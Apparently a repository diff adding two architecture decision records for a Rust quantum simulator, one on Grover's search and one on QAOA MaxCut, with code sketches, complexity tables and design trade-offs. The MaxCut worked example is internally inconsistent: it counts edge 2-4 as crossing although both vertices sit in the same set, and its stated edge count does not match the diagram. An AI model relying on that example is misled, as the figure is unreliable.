| Trait-based optimizer | Extensible | Slight abstraction overhead |
| Compact PauliString bitfield | Cache-friendly | Complex bit manipulation logic |
---
## References
- Peruzzo, A. et al. "A variational eigenvalue solver on a photonic quantum processor." Nature Communications 5, 4213 (2014)
- McClean, J.R. et al. "The theory of variational hybrid quantum-classical algorithms." New Journal of Physics 18, 023023 (2016)
- Kandala, A. et al. "Hardware-efficient variational quantum eigensolver for small molecules." Nature 549, 242-246 (2017)
- Schuld, M. et al. "Evaluating analytic gradients on quantum hardware." Physical Review A 99, 032331 (2019)
- ADR-001: ruQu Architecture - Classical Nervous System for Quantum Machines
- ADR-QE-001 through ADR-QE-004: Prior quantum engine architecture decisions
- ruQu crate: `crates/ruQu/src/` - existing syndrome processing and coherence gate infrastructure
- ruVector memory system: pattern storage for cross-molecule VQE learning

View File

@@ -0,0 +1,562 @@
# ADR-QE-006: Grover's Search Algorithm Implementation
**Status**: Proposed
**Date**: 2026-02-06
**Authors**: ruv.io, RuVector Team
**Deciders**: Architecture Review Board
## Version History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 0.1 | 2026-02-06 | ruv.io | Initial Grover's search architecture proposal |
---
## Context
### Unstructured Search and Quadratic Speedup
Grover's algorithm is one of the foundational quantum algorithms, providing a provable
quadratic speedup for unstructured search. Given a search space of N = 2^n items and an
oracle that marks one or more target items, Grover's algorithm finds a target in
O(sqrt(N)) oracle queries, compared to the classical O(N) lower bound.
### Building Blocks
The algorithm consists of two principal components applied repeatedly:
1. **Oracle (O)**: Flips the phase of marked (target) states
- On hardware: requires multi-controlled-Z decomposition into elementary gates
- In simulation: can be a single O(1) amplitude flip (key insight)
2. **Diffuser (D)**: Inversion about the mean amplitude (also called the Grover diffusion
operator)
- D = 2|s><s| - I, where |s> is the uniform superposition
- Implemented as: H^{otimes n} * (2|0><0| - I) * H^{otimes n}
### Why Simulation Unlocks a Unique Optimization
On real quantum hardware, the oracle must be decomposed into a circuit of elementary
gates. For a single marked state in n qubits, the oracle requires O(n) multi-controlled
gates, each of which may need further decomposition. The full gate count is O(n^2) or
worse depending on connectivity.
In a state vector simulator, we have **direct access to the amplitude array**. The oracle
for a known marked state at index t is simply:
```
amplitudes[t] *= -1
```
This is an O(1) operation, regardless of qubit count. This fundamentally changes the
performance profile of Grover simulation.
### Applications in ruVector
| Application | Description |
|-------------|-------------|
| Vector DB search | Encode HNSW candidate filtering as a Grover oracle |
| SAT solving | Map boolean satisfiability to oracle function |
| Cryptographic analysis | Brute-force key search with quadratic speedup |
| Database queries | Unstructured search over ruVector memory entries |
| Algorithm benchmarking | Reference implementation for quantum advantage studies |
---
## Decision
### 1. Oracle Implementation Strategy
We provide two oracle modes: optimized index-based for known targets, and general
unitary oracle for black-box functions.
#### Mode A: Index-Based Oracle (O(1) per application)
When the target index is known (or the oracle can be expressed as a predicate on
basis state indices), we bypass gate decomposition entirely:
```rust
impl QuantumState {
/// Apply Grover oracle by direct amplitude negation.
///
/// Flips the sign of amplitude at the given index.
/// This is an O(1) operation -- the key simulation advantage.
///
/// On hardware, this would require O(n) multi-controlled gates
/// decomposed into O(n^2) elementary gates.
#[inline]
pub fn oracle_flip(&mut self, target_index: usize) {
debug_assert!(target_index < self.amplitudes.len());
self.amplitudes[target_index] = -self.amplitudes[target_index];
}
/// Apply Grover oracle for multiple marked states.
///
/// Complexity: O(k) where k = number of marked states.
/// Hardware equivalent: O(k * n^2) gates.
pub fn oracle_flip_multi(&mut self, target_indices: &[usize]) {
for &idx in target_indices {
debug_assert!(idx < self.amplitudes.len());
self.amplitudes[idx] = -self.amplitudes[idx];
}
}
}
```
**Why this is valid**: The oracle operator O is defined as the diagonal unitary
O = I - 2|t><t|, which maps |t> to -|t> and leaves all other basis states unchanged.
In the amplitude array, this is exactly `amplitudes[t] *= -1`. No physical gate
decomposition is needed because we are simulating the mathematical operator directly.
#### Mode B: General Unitary Oracle
For black-box oracle functions where the marked states are not known in advance:
```rust
/// A general oracle as a unitary operation on the state vector.
///
/// The oracle function receives a basis state index and returns
/// true if it should be marked (phase-flipped).
pub trait GroverOracle: Send {
/// Evaluate whether basis state |index> is a target.
fn is_marked(&self, index: usize, n_qubits: usize) -> bool;
}
impl QuantumState {
/// Apply a general Grover oracle.
///
/// Iterates over all 2^n amplitudes, evaluating the oracle predicate.
/// Complexity: O(2^n) per application (equivalent to hardware cost).
pub fn oracle_apply(&mut self, oracle: &dyn GroverOracle) {
let n_qubits = self.n_qubits;
for i in 0..self.amplitudes.len() {
if oracle.is_marked(i, n_qubits) {
self.amplitudes[i] = -self.amplitudes[i];
}
}
}
}
```
### 2. Diffuser Implementation
The Grover diffuser (inversion about the mean) is decomposed as:
```
D = H^{otimes n} * phase_flip(|0>) * H^{otimes n}
```
where `phase_flip(|0>)` flips the sign of the all-zeros state: (2|0><0| - I).
```
Diffuser Circuit Decomposition:
|psi> ──[H]──[phase_flip(0)]──[H]──
Expanded:
┌───┐ ┌──────────────┐ ┌───┐
q[0] ──┤ H ├───┤ ├───┤ H ├──
└───┘ │ │ └───┘
┌───┐ │ 2|0><0| - I │ ┌───┐
q[1] ──┤ H ├───┤ ├───┤ H ├──
└───┘ │ │ └───┘
┌───┐ │ │ ┌───┐
q[2] ──┤ H ├───┤ ├───┤ H ├──
└───┘ └──────────────┘ └───┘
```
Both the H^{otimes n} layers and the phase_flip(0) benefit from simulation optimizations:
```rust
impl QuantumState {
/// Apply Hadamard to all qubits.
///
/// Optimized implementation using butterfly structure.
/// Complexity: O(n * 2^n)
pub fn hadamard_all(&mut self) {
for qubit in 0..self.n_qubits {
self.apply_hadamard(qubit);
}
}
/// Flip the phase of the |0...0> state.
///
/// O(1) operation via direct indexing -- another simulation advantage.
/// On hardware, this requires an n-controlled-Z gate.
#[inline]
pub fn phase_flip_zero(&mut self) {
// |0...0> is at index 0
self.amplitudes[0] = -self.amplitudes[0];
}
/// Apply the full Grover diffuser.
///
/// D = H^n * (2|0><0| - I) * H^n
///
/// Implementation note: (2|0><0| - I) negates all states except |0>,
/// which is equivalent to a global phase of -1 followed by
/// flipping amplitude[0]. We use the phase_flip_zero + global negate
/// approach for efficiency.
pub fn grover_diffuser(&mut self) {
self.hadamard_all();
// Apply 2|0><0| - I:
// Negate all amplitudes, then flip sign of |0> again
// This gives: amp[0] -> amp[0], amp[k] -> -amp[k] for k != 0
for amp in self.amplitudes.iter_mut() {
*amp = -*amp;
}
self.amplitudes[0] = -self.amplitudes[0];
self.hadamard_all();
}
}
```
### 3. Optimal Iteration Count
The optimal number of Grover iterations for k marked states out of N = 2^n total:
```
iterations = floor(pi/4 * sqrt(N/k))
```
For a single marked state (k=1):
| Qubits (n) | N = 2^n | Optimal Iterations | Classical Steps |
|------------|---------|-------------------|----------------|
| 4 | 16 | 3 | 16 |
| 8 | 256 | 12 | 256 |
| 12 | 4,096 | 50 | 4,096 |
| 16 | 65,536 | 201 | 65,536 |
| 20 | 1,048,576 | 804 | 1,048,576 |
```rust
/// Compute the optimal number of Grover iterations.
///
/// For k marked states in a search space of 2^n:
/// iterations = floor(pi/4 * sqrt(2^n / k))
pub fn optimal_iterations(n_qubits: usize, n_marked: usize) -> usize {
let n = (1_usize << n_qubits) as f64;
let k = n_marked as f64;
(std::f64::consts::FRAC_PI_4 * (n / k).sqrt()).floor() as usize
}
```
### 4. Complete Grover Algorithm
```rust
/// Configuration for Grover's search.
pub struct GroverConfig {
/// Number of qubits
pub n_qubits: usize,
/// Target indices (for index-based oracle)
pub targets: Vec<usize>,
/// Custom oracle (overrides targets if set)
pub oracle: Option<Box<dyn GroverOracle>>,
/// Override iteration count (auto-computed if None)
pub iterations: Option<usize>,
/// Number of measurement shots (for probabilistic result)
pub shots: usize,
}
/// Result of Grover's search.
pub struct GroverResult {
/// Most likely measurement outcome (basis state index)
pub found_index: usize,
/// Probability of measuring the found state
pub success_probability: f64,
/// Number of Grover iterations performed
pub iterations: usize,
/// Total wall-clock time
pub elapsed: Duration,
/// Full probability distribution (optional, for analysis)
pub probabilities: Option<Vec<f64>>,
}
```
**Pseudocode for the complete algorithm**:
```rust
pub fn grover_search(config: &GroverConfig) -> GroverResult {
let n = config.n_qubits;
let num_states = 1 << n;
// Step 1: Initialize uniform superposition
// |s> = H^n |0...0> = (1/sqrt(N)) * sum_k |k>
let mut state = QuantumState::new(n);
state.hadamard_all(); // O(n * 2^n)
// Step 2: Determine iteration count
let k = config.targets.len();
let iterations = config.iterations
.unwrap_or_else(|| optimal_iterations(n, k));
// Step 3: Apply Grover iterations
for _iter in 0..iterations {
// Oracle: flip phase of marked states
match &config.oracle {
Some(oracle) => state.oracle_apply(oracle.as_ref()),
None => state.oracle_flip_multi(&config.targets),
}
// Diffuser: inversion about the mean
state.grover_diffuser();
}
// Step 4: Measure (find highest-probability state)
let probabilities: Vec<f64> = state.amplitudes.iter()
.map(|a| a.norm_sqr())
.collect();
let found_index = probabilities.iter()
.enumerate()
.max_by(|(_, a), (_, b)| a.partial_cmp(b).unwrap())
.map(|(i, _)| i)
.unwrap();
GroverResult {
found_index,
success_probability: probabilities[found_index],
iterations,
elapsed: start.elapsed(),
probabilities: Some(probabilities),
}
}
```
### 5. The O(1) Oracle Trick: Simulation-Unique Advantage
This section formalizes the performance advantage unique to state vector simulation.
**Hardware cost model** (per Grover iteration):
```
Oracle (hardware):
- Multi-controlled-Z gate: O(n) Toffoli gates
- Each Toffoli: ~6 CNOT + single-qubit gates
- Total: O(n) gates, each touching O(2^n) amplitudes in simulation
- Simulation cost: O(n * 2^n) per oracle application
Diffuser (hardware):
- H^n: n Hadamard gates = O(n * 2^n) simulation ops
- Multi-controlled-Z: same as oracle = O(n * 2^n) simulation ops
- H^n: O(n * 2^n) again
- Total: O(n * 2^n) per diffuser
Per iteration (hardware path): O(n * 2^n)
Total (hardware path): O(n * 2^n * sqrt(2^n)) = O(n * 2^(3n/2))
```
**Simulation cost model** (with O(1) oracle optimization):
```
Oracle (optimized):
- Direct amplitude flip: O(1) for single target, O(k) for k targets
- Simulation cost: O(k)
Diffuser (optimized):
- H^n: O(n * 2^n) -- unavoidable
- phase_flip(0): O(1) via direct index
- H^n: O(n * 2^n)
- Total: O(n * 2^n) per diffuser
Per iteration (optimized): O(n * 2^n) [dominated by diffuser]
Total (optimized): O(n * 2^n * sqrt(2^n)) = O(n * 2^(3n/2))
```
The asymptotic complexity is the same (diffuser dominates), but the constant factor
improvement is significant: the oracle step drops from O(n * 2^n) to O(k), saving
roughly 50% of per-iteration time for single-target search.
### 6. Multi-Target Grover Support
When multiple states are marked (k > 1), the algorithm converges faster:
```
iterations(k) = floor(pi/4 * sqrt(N/k))
```
The success probability oscillates sinusoidally. For k targets:
```
P(success after t iterations) = sin^2((2t+1) * arcsin(sqrt(k/N)))
```
```rust
/// Compute success probability after t Grover iterations.
pub fn success_probability(n_qubits: usize, n_marked: usize, iterations: usize) -> f64 {
let n = (1_usize << n_qubits) as f64;
let k = n_marked as f64;
let theta = (k / n).sqrt().asin();
let angle = (2.0 * iterations as f64 + 1.0) * theta;
angle.sin().powi(2)
}
```
**Over-iteration risk**: If too many iterations are applied, the algorithm starts
"uncomputing" the answer. The success probability oscillates with period
~pi * sqrt(N/k) / 2. Our implementation auto-computes the optimal count and warns
if the user-specified count deviates significantly.
### 7. Performance Benchmarks
#### Measured Performance Estimates
| Qubits | States | Iterations | Oracle Cost | Diffuser Cost | Total |
|--------|--------|-----------|-------------|--------------|-------|
| 4 | 16 | 3 | 3 * O(1) | 3 * O(64) | <0.01ms |
| 8 | 256 | 12 | 12 * O(1) | 12 * O(2048) | <0.1ms |
| 12 | 4,096 | 50 | 50 * O(1) | 50 * O(49K) | ~1ms |
| 16 | 65,536 | 201 | 201 * O(1) | 201 * O(1M) | ~10ms |
| 20 | 1,048,576 | 804 | 804 * O(1) | 804 * O(20M) | ~500ms |
| 24 | 16,777,216 | 3,217 | 3217 * O(1) | 3217 * O(402M) | ~60s |
**Gate-count equivalent** (for comparison with hardware gate-based simulation):
| Qubits | Grover Iterations | Equivalent Gate Count | Index-Optimized Ops |
|--------|------------------|----------------------|---------------------|
| 8 | 12 | ~200 gates | ~25K ops |
| 12 | 50 | ~1,500 gates | ~2.5M ops |
| 16 | 201 | ~10,000 gates | ~200M ops |
| 20 | 804 | ~60,000 gates | ~16B ops |
The "gates" column counts oracle gates (decomposed) + diffuser gates. The "ops" column
counts actual floating-point operations in the optimized simulation path. The ratio
confirms that the O(1) oracle trick yields a roughly 2x constant-factor improvement
for the overall search.
### 8. Integration with HNSW Index for Hybrid Quantum-Classical Search
A speculative but architecturally sound integration path connects Grover's search with
ruVector's HNSW (Hierarchical Navigable Small World) index:
```
Hybrid Quantum-Classical Nearest-Neighbor Search
=================================================
Phase 1: Classical HNSW (coarse filtering)
- Navigate the HNSW graph to find candidate neighborhood
- Reduce search space from N to ~sqrt(N) candidates
- Time: O(log N)
Phase 2: Grover's Search (fine filtering)
- Encode candidate set as Grover oracle
- Search for exact nearest neighbor among candidates
- Quadratic speedup over brute-force comparison
- Time: O(N^{1/4}) for sqrt(N) candidates
Combined: O(log N + N^{1/4}) vs classical O(log N + sqrt(N))
┌──────────────────────────────────────────────┐
│ HNSW Layer Navigation │
│ │
│ Layer 3: o ─────────── o ────── o │
│ │ │ │
│ Layer 2: o ── o ────── o ── o ──o │
│ │ │ │ │ │ │
│ Layer 1: o─o──o──o──o──o─o──o──o─o │
│ │ │ │ │ │ │ │ │ │ │ │
│ Layer 0: o-o-oo-oo-oo-oo-o-oo-oo-o │
│ │ │
│ ┌───────▼────────┐ │
│ │ Candidate Pool │ │
│ │ ~sqrt(N) items│ │
│ └───────┬────────┘ │
│ │ │
└────────────────────┼───────────────────────────┘
┌──────────▼───────────┐
│ Grover's Search │
│ │
│ Oracle: distance │
│ threshold on │
│ candidate indices │
│ │
│ O(N^{1/4}) queries │
└──────────────────────┘
```
This integration is facilitated by ruVector's existing HNSW implementation
(150x-12,500x faster than baseline, per ruVector performance targets). The Grover
oracle would encode a distance-threshold predicate: "is vector[i] within distance d
of the query vector?"
```rust
/// Oracle that marks basis states corresponding to vectors
/// within distance threshold of a query.
pub struct HnswGroverOracle {
/// Candidate indices from HNSW coarse search
pub candidates: Vec<usize>,
/// Query vector
pub query: Vec<f32>,
/// Distance threshold
pub threshold: f32,
/// Pre-computed distances (for O(1) oracle evaluation)
pub distances: Vec<f32>,
}
impl GroverOracle for HnswGroverOracle {
fn is_marked(&self, index: usize, _n_qubits: usize) -> bool {
if index < self.distances.len() {
self.distances[index] <= self.threshold
} else {
false
}
}
}
```
**Note**: This hybrid approach is currently theoretical for classical simulation.
Its value lies in (a) algorithm prototyping for future quantum hardware, and
(b) demonstrating integration patterns between quantum algorithms and classical
data structures.
---
## Consequences
### Benefits
1. **O(1) oracle optimization** provides a 2x constant-factor speedup unique to state
vector simulation, making Grover's algorithm practical for up to 20+ qubits
2. **Dual oracle modes** support both fast known-target search (index-based) and general
black-box function search (predicate-based)
3. **Auto-computed iteration count** prevents over-iteration and ensures near-optimal
success probability
4. **Multi-target support** handles the general case of k marked states with appropriate
iteration adjustment
5. **HNSW integration path** provides a concrete vision for hybrid quantum-classical
search that leverages ruVector's existing vector database infrastructure
### Risks
| Risk | Probability | Impact | Mitigation |
|------|------------|--------|------------|
| Diffuser dominates runtime, limiting oracle optimization benefit | High | Low | Accept 2x improvement; focus on SIMD-optimized Hadamard |
| Multi-target count unknown in practice | Medium | Medium | Quantum counting subroutine (future work) |
| HNSW integration adds complexity with unclear practical advantage | Low | Low | Keep as optional module, prototype-only initially |
| Over-iteration produces incorrect results | Low | High | Auto-compute + warning system + probability tracking |
### Trade-offs
| Decision | Advantage | Disadvantage |
|----------|-----------|--------------|
| O(1) index oracle | Massive speedup for known targets | Not applicable to true black-box search |
| Auto iteration count | Prevents user error | Less flexible for advanced use cases |
| General oracle trait | Supports arbitrary predicates | O(2^n) per application (no speedup over gates) |
| Eager probability tracking | Enables convergence monitoring | Memory overhead for probability vector |
---
## References
- Grover, L.K. "A fast quantum mechanical algorithm for database search." Proceedings of the 28th Annual ACM Symposium on Theory of Computing, 212-219 (1996)
- Boyer, M., Brassard, G., Hoyer, P., Tapp, A. "Tight bounds on quantum searching." Fortschritte der Physik 46, 493-505 (1998)
- Malviya, Y.K., Zapatero, R.A. "Quantum search algorithms for database search: A comprehensive review." arXiv:2311.01265 (2023)
- ADR-001: ruQu Architecture - Classical Nervous System for Quantum Machines
- ADR-QE-005: VQE Algorithm Support (parameterized circuits, expectation values)
- ruVector HNSW implementation: 150x-12,500x faster pattern search (CLAUDE.md performance targets)
- ruQu crate: `crates/ruQu/src/` - syndrome processing and state vector infrastructure

View File

@@ -0,0 +1,631 @@
# ADR-QE-007: QAOA MaxCut Implementation
**Status**: Proposed
**Date**: 2026-02-06
**Authors**: ruv.io, RuVector Team
**Deciders**: Architecture Review Board
## Version History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 0.1 | 2026-02-06 | ruv.io | Initial QAOA MaxCut architecture proposal |
---
## Context
### Combinatorial Optimization on Quantum Computers
The Quantum Approximate Optimization Algorithm (QAOA), introduced by Farhi, Goldstone,
and Gutmann (2014), is a leading candidate for demonstrating quantum advantage on
combinatorial optimization problems. QAOA constructs a parameterized quantum circuit that
encodes the cost function of an optimization problem and uses classical outer-loop
optimization to find parameters that maximize the expected cost.
### MaxCut as the Canonical QAOA Problem
MaxCut is the prototypical problem for QAOA: given a graph G = (V, E), partition the
vertices into two sets S and S-complement to maximize the number of edges crossing the
partition.
```
MaxCut Example (5 vertices, 6 edges):
0 ─── 1
│ \ │
│ \ │
3 ─── 2
4
Optimal cut: S = {0, 2, 4}, S' = {1, 3}
Cut value: 5 edges crossing (0-1, 0-3, 1-2, 2-3, 2-4)
```
The cost function is:
```
C(z) = sum_{(i,j) in E} (1 - z_i * z_j) / 2
```
where z_i in {+1, -1} encodes the partition assignment.
### QAOA Circuit Structure
A depth-p QAOA circuit alternates two types of layers:
1. **Phase separation** (encodes the problem): For each edge (i,j), apply
exp(-i * gamma * Z_i Z_j / 2)
2. **Mixing** (explores the solution space): For each qubit i, apply
exp(-i * beta * X_i) = Rx(2*beta)
```
QAOA Circuit (p layers):
|+> ──[Phase(gamma_1)]──[Mix(beta_1)]──[Phase(gamma_2)]──[Mix(beta_2)]── ... ──[Measure]
Parameters: gamma = [gamma_1, ..., gamma_p], beta = [beta_1, ..., beta_p] │
Classical
Optimizer
```
### Why QAOA Matters for ruQu
| Motivation | Details |
|------------|---------|
| Optimization benchmarks | Standard workload for evaluating quantum simulator performance |
| Graph problems | Natural integration with ruVector graph database (ruvector-graph) |
| Variational algorithm | Shares infrastructure with VQE (ADR-QE-005): parameterized circuits, expectation values, classical optimizers |
| Scalability study | QAOA depth and graph size provide tunable complexity for benchmarking |
| Agent integration | ruVector agents can use QAOA to solve graph optimization tasks autonomously |
---
## Decision
### 1. Phase Separation Operator: Native Rzz Gate
The phase separation operator for MaxCut applies exp(-i * gamma * Z_i Z_j / 2) for
each edge (i,j). We implement this as a native two-qubit operation via direct amplitude
manipulation, avoiding CNOT decomposition.
**Mathematical basis**:
```
exp(-i * theta * Z_i Z_j / 2) acts on computational basis states as:
|00> -> e^{-i*theta/2} |00> (Z_i Z_j = +1)
|01> -> e^{+i*theta/2} |01> (Z_i Z_j = -1)
|10> -> e^{+i*theta/2} |10> (Z_i Z_j = -1)
|11> -> e^{-i*theta/2} |11> (Z_i Z_j = +1)
```
In the state vector, for each amplitude at index k:
- Extract bits i and j from k
- Compute parity = bit_i XOR bit_j
- Apply phase: `amp[k] *= exp(-i * theta * (-1)^parity / 2)`
- If parity = 0 (same bits): `amp[k] *= exp(-i * theta / 2)`
- If parity = 1 (different bits): `amp[k] *= exp(+i * theta / 2)`
```rust
impl QuantumState {
/// Apply Rzz(theta) = exp(-i * theta * Z_i Z_j / 2) via direct amplitude
/// manipulation.
///
/// For each basis state |k>:
/// - Compute parity of bits i and j in k
/// - Apply phase e^{-i * theta * (-1)^parity / 2}
///
/// Complexity: O(2^n) -- single pass over state vector.
/// Vectorizable: all amplitudes are independent (no swaps).
///
/// Hardware equivalent: CNOT(i,j) + Rz(theta, j) + CNOT(i,j) = 3 gates.
pub fn rzz(&mut self, theta: f64, qubit_i: usize, qubit_j: usize) {
let phase_same = Complex64::from_polar(1.0, -theta / 2.0);
let phase_diff = Complex64::from_polar(1.0, theta / 2.0);
let mask_i = 1_usize << qubit_i;
let mask_j = 1_usize << qubit_j;
for k in 0..self.amplitudes.len() {
let bit_i = (k & mask_i) >> qubit_i;
let bit_j = (k & mask_j) >> qubit_j;
let parity = bit_i ^ bit_j;
if parity == 0 {
self.amplitudes[k] *= phase_same;
} else {
self.amplitudes[k] *= phase_diff;
}
}
}
}
```
**Vectorization opportunity**: The inner loop is a streaming operation over the amplitude
array with no data dependencies between iterations. This is ideal for SIMD vectorization
(AVX-512 can process 8 complex64 values per instruction) and parallelization across
cores.
### 2. Mixing Operator
The mixing operator applies Rx(2*beta) to each qubit:
```
Rx(2*beta) = exp(-i * beta * X) = [[cos(beta), -i*sin(beta)],
[-i*sin(beta), cos(beta)]]
```
This uses the standard single-qubit gate application from the simulator core:
```rust
impl QuantumState {
/// Apply the QAOA mixing operator: Rx(2*beta) on each qubit.
///
/// Complexity: O(n * 2^n) for n qubits.
pub fn qaoa_mixing(&mut self, beta: f64) {
for qubit in 0..self.n_qubits {
self.rx(2.0 * beta, qubit);
}
}
}
```
### 3. QAOA Circuit Construction
A convenience function builds the full QAOA circuit from a graph and parameters:
```rust
/// A graph represented as an edge list with optional weights.
pub struct Graph {
/// Number of vertices
pub n_vertices: usize,
/// Edges: (vertex_i, vertex_j, weight)
pub edges: Vec<(usize, usize, f64)>,
}
impl Graph {
/// Construct from adjacency list.
pub fn from_adjacency_list(adj: &[Vec<usize>]) -> Self;
/// Construct from edge list (unweighted, weight = 1.0).
pub fn from_edge_list(n_vertices: usize, edges: &[(usize, usize)]) -> Self;
/// Load from ruVector graph query result.
pub fn from_ruvector_query(result: &GraphQueryResult) -> Self;
}
/// QAOA configuration.
pub struct QaoaConfig {
/// Graph defining the MaxCut instance
pub graph: Graph,
/// QAOA depth (number of layers)
pub p: usize,
/// Gamma parameters (phase separation angles), length = p
pub gammas: Vec<f64>,
/// Beta parameters (mixing angles), length = p
pub betas: Vec<f64>,
}
/// Build and simulate a QAOA circuit for MaxCut.
///
/// Circuit structure for depth p:
/// 1. Initialize |+>^n (Hadamard on all qubits)
/// 2. For layer l = 1..p:
/// a. Phase separation: Rzz(gamma_l, i, j) for each edge (i,j)
/// b. Mixing: Rx(2*beta_l) on each qubit
/// 3. Return final state
pub fn build_qaoa_circuit(config: &QaoaConfig) -> QuantumState {
let n = config.graph.n_vertices;
let mut state = QuantumState::new(n);
// Step 1: Initialize uniform superposition
state.hadamard_all();
// Step 2: Alternating phase separation and mixing layers
for layer in 0..config.p {
let gamma = config.gammas[layer];
let beta = config.betas[layer];
// Phase separation: apply Rzz for each edge
for &(i, j, weight) in &config.graph.edges {
state.rzz(gamma * weight, i, j);
}
// Mixing: Rx(2*beta) on each qubit
state.qaoa_mixing(beta);
}
state
}
```
**Pseudocode for the complete QAOA MaxCut solver**:
```rust
pub fn qaoa_maxcut(
graph: &Graph,
p: usize,
optimizer: &mut dyn ClassicalOptimizer,
config: &QaoaOptConfig,
) -> QaoaResult {
let n_params = 2 * p; // p gammas + p betas
optimizer.initialize(n_params);
let mut params = config.initial_params.clone()
.unwrap_or_else(|| {
// Standard initialization: gamma in [0, pi], beta in [0, pi/2]
let mut p_init = vec![0.0; n_params];
for i in 0..p {
p_init[i] = 0.5; // gamma_i
p_init[p + i] = 0.25; // beta_i
}
p_init
});
let mut best_cost = f64::NEG_INFINITY;
let mut best_params = params.clone();
let mut history = Vec::new();
for iteration in 0..config.max_iterations {
let gammas = params[..p].to_vec();
let betas = params[p..].to_vec();
// Build and simulate circuit
let qaoa_config = QaoaConfig {
graph: graph.clone(),
p,
gammas,
betas,
};
let state = build_qaoa_circuit(&qaoa_config);
// Evaluate MaxCut cost function
let cost = maxcut_expectation(&state, graph);
if cost > best_cost {
best_cost = cost;
best_params = params.clone();
}
// Gradient computation (parameter-shift rule, same as VQE)
let grad = if optimizer.needs_gradient() {
Some(qaoa_gradient(graph, p, &params))
} else {
None
};
history.push(QaoaIteration { iteration, cost, params: params.clone() });
let result = optimizer.step(&params, -cost, grad.as_deref());
// Note: negate cost because optimizer minimizes
params = result.new_params;
if result.converged {
break;
}
}
// Sample the final state to get candidate cuts
let final_state = build_qaoa_circuit(&QaoaConfig {
graph: graph.clone(),
p,
gammas: best_params[..p].to_vec(),
betas: best_params[p..].to_vec(),
});
let best_cut = sample_maxcut(&final_state, graph, config.sample_shots);
QaoaResult {
best_cost,
best_params,
best_cut,
iterations: history.len(),
history,
approximation_ratio: best_cost / graph.max_cut_upper_bound(),
}
}
```
### 4. Cost Function Evaluation
The MaxCut cost function in Pauli operator form is:
```
C = sum_{(i,j) in E} w_{ij} * (1 - Z_i Z_j) / 2
```
This reuses the PauliSum expectation API from ADR-QE-005:
```rust
/// Compute the MaxCut cost as the expectation value of the cost Hamiltonian.
///
/// C = sum_{(i,j) in E} w_ij * (1 - Z_i Z_j) / 2
/// = sum_{(i,j) in E} w_ij/2 - sum_{(i,j) in E} w_ij/2 * Z_i Z_j
/// = const - sum_{(i,j)} w_ij/2 * <Z_i Z_j>
///
/// Each Z_i Z_j expectation is computed via the efficient diagonal trick:
/// <psi| Z_i Z_j |psi> = sum_k |amp_k|^2 * (-1)^{bit_i(k) XOR bit_j(k)}
pub fn maxcut_expectation(state: &QuantumState, graph: &Graph) -> f64 {
let mut cost = 0.0;
for &(i, j, weight) in &graph.edges {
let mask_i = 1_usize << i;
let mask_j = 1_usize << j;
let mut zz_expectation = 0.0;
for k in 0..state.amplitudes.len() {
let bit_i = (k & mask_i) >> i;
let bit_j = (k & mask_j) >> j;
let parity = bit_i ^ bit_j;
let sign = 1.0 - 2.0 * parity as f64; // +1 if same, -1 if different
zz_expectation += state.amplitudes[k].norm_sqr() * sign;
}
cost += weight * (1.0 - zz_expectation) / 2.0;
}
cost
}
```
**Optimization**: Since Z_i Z_j is diagonal in the computational basis, the expectation
reduces to a weighted sum over probabilities. No amplitude swapping is needed, and the
computation is embarrassingly parallel.
### 5. Sampling Mode
In addition to exact expectation values, we support sampling the final state to
obtain candidate cuts:
```rust
/// Sample the QAOA state to find candidate MaxCut solutions.
///
/// Returns the best cut found across `shots` samples.
pub fn sample_maxcut(
state: &QuantumState,
graph: &Graph,
shots: usize,
) -> MaxCutSolution {
let probabilities: Vec<f64> = state.amplitudes.iter()
.map(|a| a.norm_sqr())
.collect();
let mut best_cut_value = 0.0;
let mut best_bitstring = 0_usize;
let mut rng = thread_rng();
for _ in 0..shots {
// Sample from probability distribution
let sample = sample_from_distribution(&probabilities, &mut rng);
// Evaluate cut value for this bitstring
let cut_value = evaluate_cut(sample, graph);
if cut_value > best_cut_value {
best_cut_value = cut_value;
best_bitstring = sample;
}
}
MaxCutSolution {
partition: best_bitstring,
cut_value: best_cut_value,
set_s: (0..graph.n_vertices)
.filter(|&v| (best_bitstring >> v) & 1 == 1)
.collect(),
set_s_complement: (0..graph.n_vertices)
.filter(|&v| (best_bitstring >> v) & 1 == 0)
.collect(),
}
}
```
### 6. Graph Interface
Three input modes cover common use cases:
```rust
impl Graph {
/// From adjacency list (unweighted).
///
/// Example: adj[0] = [1, 3] means vertex 0 connects to 1 and 3.
pub fn from_adjacency_list(adj: &[Vec<usize>]) -> Self {
let n = adj.len();
let mut edges = Vec::new();
let mut seen = std::collections::HashSet::new();
for (u, neighbors) in adj.iter().enumerate() {
for &v in neighbors {
let edge = if u < v { (u, v) } else { (v, u) };
if seen.insert(edge) {
edges.push((edge.0, edge.1, 1.0));
}
}
}
Self { n_vertices: n, edges }
}
/// From edge list with uniform weight.
pub fn from_edge_list(n_vertices: usize, edge_list: &[(usize, usize)]) -> Self {
Self {
n_vertices,
edges: edge_list.iter().map(|&(u, v)| (u, v, 1.0)).collect(),
}
}
/// From ruVector graph database query result.
///
/// Enables QAOA MaxCut on graphs stored in ruvector-graph.
pub fn from_ruvector_query(result: &GraphQueryResult) -> Self {
// Convert ruvector-graph nodes and edges to QAOA format
// Vertex IDs are remapped to contiguous 0..n range
todo!()
}
}
```
### 7. Tensor Network Optimization for Sparse Graphs
For sparse or planar graphs, the QAOA state can be represented more efficiently using
tensor network contraction. The key insight is that QAOA circuits have a structure
dictated by the graph topology:
```
Tensor Network View of QAOA:
Qubit 0: ──[H]──[Rzz(0,1)]──[Rzz(0,3)]──[Rx]── ...
Qubit 1: ──[H]──[Rzz(0,1)]──[Rzz(1,2)]──[Rx]── ...
Qubit 2: ──[H]──[Rzz(1,2)]──[Rzz(2,3)]──[Rx]── ...
Qubit 3: ──[H]──[Rzz(0,3)]──[Rzz(2,3)]──[Rx]── ...
For a planar graph with treewidth w, tensor contraction costs O(2^w * poly(n))
instead of O(2^n). For many practical graphs, w << n.
```
```rust
/// Detect graph treewidth and decide simulation strategy.
pub fn select_simulation_strategy(graph: &Graph) -> SimulationStrategy {
let treewidth = estimate_treewidth(graph);
let n = graph.n_vertices;
if treewidth <= 20 && n > 24 {
// Tensor network contraction is cheaper than full state vector
SimulationStrategy::TensorNetwork {
contraction_order: compute_contraction_order(graph),
estimated_cost: (1 << treewidth) * n * n,
}
} else {
SimulationStrategy::StateVector {
estimated_cost: 1 << n,
}
}
}
pub enum SimulationStrategy {
StateVector { estimated_cost: usize },
TensorNetwork {
contraction_order: Vec<ContractionStep>,
estimated_cost: usize,
},
}
```
### 8. Performance Analysis
